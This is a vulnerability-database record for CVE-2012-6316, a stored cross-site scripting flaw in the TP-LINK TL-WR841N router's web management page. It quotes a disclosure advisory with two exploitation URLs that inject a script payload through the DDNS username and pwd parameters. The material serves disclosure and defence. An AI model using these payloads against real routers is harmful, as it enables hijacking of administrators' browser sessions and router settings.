ID
VAR-E-201211-0304
CVE
cve_id: | CVE-2012-6316 | Trust: 0.8 |
TITLE
TP-LINK TL-WR841N 3.13.9 Cross Site Scripting
Trust: 0.5
DESCRIPTION
TP-LINK TL-WR841N versions 3.13.9 Build 120201 Rel.54965n and below suffer from a cross site scripting vulnerability.
Trust: 0.5
AFFECTED PRODUCTS
vendor: | tp link | model: | tl-wr841n | scope: | eq | version: | 3.13.9 | Trust: 0.5 |
EXPLOIT
=| Security Advisory - TP-LINK TL-WR841N XSS (Cross Site Scripting) |=
Issue: TL-WR841N 300Mbps Wireless N Router by "TP-LINK"
Firmware Version: 3.13.9 Build 120201 Rel.54965n and Below
Discovered Date: 17/11/2012
Author: Matan Azugi [matan@madsec.co.il]
Product Vendor: http://www.tp-link.com/en/products/details/?model=TL-WR841N
Details:
TP-LINK TL-WR841N Wireless Router is prone to Cross Site Scripting
Vulnerability.
The vulnerability exists in Web-Based Management.
Remote authenticated administrators may inject arbitrary JavaScript or HTML
via the username parameter or via pwd parameter to exploit Stored Cross Site
Scripting condition. \xa0
Exploitation URL:
1.
http://192.168.0.1/userRpm/NoipDdnsRpm.htm?provider=3&username=a1234</script
><script>alert(1)</script>12aaa34f5be&pwd=password&cliUrl=&Save=Save
2.
http://192.168.0.1/userRpm/NoipDdnsRpm.htm?provider=3&username=1234&pwd=a123
4</script><script>alert(1)</script>12aaa34f5be&cliUrl=&Save=Save
Successful exploitation allows the attacker to steal user information and
may allow the attacker to take full control over the user Browser.
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TYPE
xss
Trust: 0.5
TAGS
tag: | exploit | Trust: 0.5 |
tag: | xss | Trust: 0.5 |
CREDITS
Matan Azugi
Trust: 0.5
EXTERNAL IDS
db: | NVD | id: | CVE-2012-6316 | Trust: 0.8 |
db: | PACKETSTORM | id: | 118237 | Trust: 0.5 |
db: | BID | id: | 56602 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2012-6316 | Trust: 0.5 |
SOURCES
db: | BID | id: | 56602 |
db: | PACKETSTORM | id: | 118237 |
LAST UPDATE DATE
2022-07-27T09:52:11.706000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 56602 | date: | 2012-12-07T21:20:00 |
SOURCES RELEASE DATE
db: | BID | id: | 56602 | date: | 2012-11-20T00:00:00 |
db: | PACKETSTORM | id: | 118237 | date: | 2012-11-20T23:42:47 |